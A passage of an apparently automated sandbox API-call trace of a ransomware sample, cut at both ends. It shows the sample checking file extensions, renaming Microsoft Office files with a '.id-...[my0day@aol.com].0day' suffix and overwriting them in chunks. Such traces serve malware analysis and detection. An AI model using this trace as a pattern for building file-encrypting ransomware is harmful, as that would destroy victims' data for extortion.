(lpString=".bz2") returned 4 [0055.139] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.139] lstrlenW (lpString=".7z") returned 3 [0055.139] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.139] lstrlenW (lpString=".dbf") returned 4 [0055.139] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.139] lstrlenW (lpString=".1cd") returned 4 [0055.139] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.139] lstrlenW (lpString=".jpg") returned 4 [0055.139] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.140] lstrlenW (lpString=".doc") returned 4 [0055.140] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.140] lstrlenW (lpString=".docx") returned 5 [0055.140] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0055.140] lstrlenW (lpString=".pdf") returned 4 [0055.140] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.140] lstrlenW (lpString=".xls") returned 4 [0055.140] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.140] lstrlenW (lpString=".xlsx") returned 5 [0055.140] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0055.140] lstrlenW (lpString=".ppt") returned 4 [0055.140] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.140] lstrlenW (lpString=".zip") returned 4 [0055.140] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.140] lstrlenW (lpString=".rar") returned 4 [0055.140] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.140] lstrlenW (lpString=".bz2") returned 4 [0055.140] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.140] lstrlenW (lpString=".7z") returned 3 [0055.140] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.140] lstrlenW (lpString=".dbf") returned 4 [0055.140] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.140] lstrlenW (lpString=".1cd") returned 4 [0055.140] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.140] lstrlenW (lpString=".jpg") returned 4 [0055.140] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.141] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.141] lstrlenW (lpString="IpsMigrationPlugin.dll.mui") returned 26 [0055.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0056.429] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=2560) returned 1 [0056.429] CloseHandle (hObject=0x1fc) returned 1 [0056.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui")) returned 0x20 [0056.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.430] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.430] lstrlenW (lpString=".doc") returned 4 [0056.430] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0056.430] lstrlenW (lpString=".docx") returned 5 [0056.430] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0056.430] lstrlenW (lpString=".pdf") returned 4 [0056.430] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0056.430] lstrlenW (lpString=".xls") returned 4 [0056.430] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0056.430] lstrlenW (lpString=".xlsx") returned 5 [0056.430] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0056.430] lstrlenW (lpString=".ppt") returned 4 [0056.430] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0056.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.430] lstrlenW (lpString=".zip") returned 4 [0056.430] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0056.430] lstrlenW (lpString=".rar") returned 4 [0056.430] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0056.430] lstrlenW (lpString=".bz2") returned 4 [0056.430] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0056.430] lstrlenW (lpString=".7z") returned 3 [0056.430] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0056.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.430] lstrlenW (lpString=".dbf") returned 4 [0056.430] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0056.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.430] lstrlenW (lpString=".1cd") returned 4 [0056.430] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0056.430] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.431] lstrlenW (lpString=".jpg") returned 4 [0056.431] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0056.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.431] lstrlenW (lpString=".doc") returned 4 [0056.431] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0056.431] lstrlenW (lpString=".docx") returned 5 [0056.431] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0056.431] lstrlenW (lpString=".pdf") returned 4 [0056.431] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0056.431] lstrlenW (lpString=".xls") returned 4 [0056.431] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0056.431] lstrlenW (lpString=".xlsx") returned 5 [0056.431] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0056.431] lstrlenW (lpString=".ppt") returned 4 [0056.431] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0056.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.431] lstrlenW (lpString=".zip") returned 4 [0056.431] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0056.431] lstrlenW (lpString=".rar") returned 4 [0056.431] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0056.431] lstrlenW (lpString=".bz2") returned 4 [0056.431] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0056.431] lstrlenW (lpString=".7z") returned 3 [0056.431] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0056.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.431] lstrlenW (lpString=".dbf") returned 4 [0056.431] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0056.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.431] lstrlenW (lpString=".1cd") returned 4 [0056.431] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0056.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0056.431] lstrlenW (lpString=".jpg") returned 4 [0056.432] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0056.432] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0056.432] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0056.432] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0056.564] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=3584) returned 1 [0056.564] CloseHandle (hObject=0x218) returned 1 [0056.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui")) returned 0x20 [0056.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.565] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.565] lstrlenW (lpString=".doc") returned 4 [0056.565] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0056.565] lstrlenW (lpString=".docx") returned 5 [0056.565] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0056.565] lstrlenW (lpString=".pdf") returned 4 [0056.565] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0056.565] lstrlenW (lpString=".xls") returned 4 [0056.565] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0056.565] lstrlenW (lpString=".xlsx") returned 5 [0056.565] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0056.565] lstrlenW (lpString=".ppt") returned 4 [0056.565] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0056.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.565] lstrlenW (lpString=".zip") returned 4 [0056.565] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0056.565] lstrlenW (lpString=".rar") returned 4 [0056.565] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0056.565] lstrlenW (lpString=".bz2") returned 4 [0056.565] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0056.565] lstrlenW (lpString=".7z") returned 3 [0056.565] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0056.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.565] lstrlenW (lpString=".dbf") returned 4 [0056.565] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0056.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.565] lstrlenW (lpString=".1cd") returned 4 [0056.565] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0056.565] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.566] lstrlenW (lpString=".jpg") returned 4 [0056.566] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0056.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.566] lstrlenW (lpString=".doc") returned 4 [0056.566] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0056.566] lstrlenW (lpString=".docx") returned 5 [0056.566] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0056.566] lstrlenW (lpString=".pdf") returned 4 [0056.566] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0056.566] lstrlenW (lpString=".xls") returned 4 [0056.566] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0056.566] lstrlenW (lpString=".xlsx") returned 5 [0056.566] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0056.566] lstrlenW (lpString=".ppt") returned 4 [0056.566] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0056.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.566] lstrlenW (lpString=".zip") returned 4 [0056.566] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0056.566] lstrlenW (lpString=".rar") returned 4 [0056.566] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0056.566] lstrlenW (lpString=".bz2") returned 4 [0056.566] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0056.566] lstrlenW (lpString=".7z") returned 3 [0056.566] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0056.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.566] lstrlenW (lpString=".dbf") returned 4 [0056.566] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0056.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.566] lstrlenW (lpString=".1cd") returned 4 [0056.566] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0056.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 72 [0056.566] lstrlenW (lpString=".jpg") returned 4 [0056.567] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0056.567] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0056.567] lstrlenW (lpString="MSOINTL.DLL") returned 11 [0056.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0056.579] GetFileSizeEx (in: hFile=0x23c, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=2528128) returned 1 [0056.579] CloseHandle (hObject=0x23c) returned 1 [0056.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll")) returned 0x20 [0056.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.579] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0056.580] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0056.580] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0056.580] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0056.580] ReadFile (in: hFile=0x23c, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0056.696] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0xcdbd5, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0056.696] ReadFile (in: hFile=0x23c, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0056.800] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0056.800] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x229380, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0056.800] ReadFile (in: hFile=0x23c, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0056.858] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.858] WriteFile (in: hFile=0x23c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0057.113] SetEndOfFile (hFile=0x23c) returned 1 [0057.478] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f820b0 [0057.482] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0057.482] WriteFile (in: hFile=0x23c, lpBuffer=0x3f820b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f820b0*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0057.483] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0xcdbd5, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0057.483] WriteFile (in: hFile=0x23c, lpBuffer=0x3f820b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f820b0*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0057.489] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x229380, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0057.489] WriteFile (in: hFile=0x23c, lpBuffer=0x3f820b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f820b0*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0057.492] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f820b0 | out: hHeap=0x5f0000) returned 1 [0057.492] CloseHandle (hObject=0x23c) returned 1 [0057.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0057.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.558] lstrlenW (lpString=".doc") returned 4 [0057.558] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.558] lstrlenW (lpString=".docx") returned 5 [0057.558] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0057.558] lstrlenW (lpString=".pdf") returned 4 [0057.558] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.558] lstrlenW (lpString=".xls") returned 4 [0057.558] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.558] lstrlenW (lpString=".xlsx") returned 5 [0057.558] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0057.558] lstrlenW (lpString=".ppt") returned 4 [0057.558] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.558] lstrlenW (lpString=".zip") returned 4 [0057.558] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.558] lstrlenW (lpString=".rar") returned 4 [0057.558] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.558] lstrlenW (lpString=".bz2") returned 4 [0057.558] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.558] lstrlenW (lpString=".7z") returned 3 [0057.558] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.558] lstrlenW (lpString=".dbf") returned 4 [0057.558] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.558] lstrlenW (lpString=".1cd") returned 4 [0057.559] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.559] lstrlenW (lpString=".jpg") returned 4 [0057.559] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.559] lstrlenW (lpString=".doc") returned 4 [0057.559] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.559] lstrlenW (lpString=".docx") returned 5 [0057.559] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0057.559] lstrlenW (lpString=".pdf") returned 4 [0057.559] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.559] lstrlenW (lpString=".xls") returned 4 [0057.559] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.559] lstrlenW (lpString=".xlsx") returned 5 [0057.559] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0057.559] lstrlenW (lpString=".ppt") returned 4 [0057.559] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.559] lstrlenW (lpString=".zip") returned 4 [0057.559] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.559] lstrlenW (lpString=".rar") returned 4 [0057.559] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.559] lstrlenW (lpString=".bz2") returned 4 [0057.559] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.559] lstrlenW (lpString=".7z") returned 3 [0057.559] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.559] lstrlenW (lpString=".dbf") returned 4 [0057.559] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.560] lstrlenW (lpString=".1cd") returned 4 [0057.560] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.560] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0057.560] lstrlenW (lpString=".jpg") returned 4 [0057.573] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.594] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0057.594] lstrlenW (lpString="ACECORE.DLL") returned 11 [0057.594] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0057.834] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=3213192) returned 1 [0057.834] CloseHandle (hObject=0x1c4) returned 1 [0057.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Common 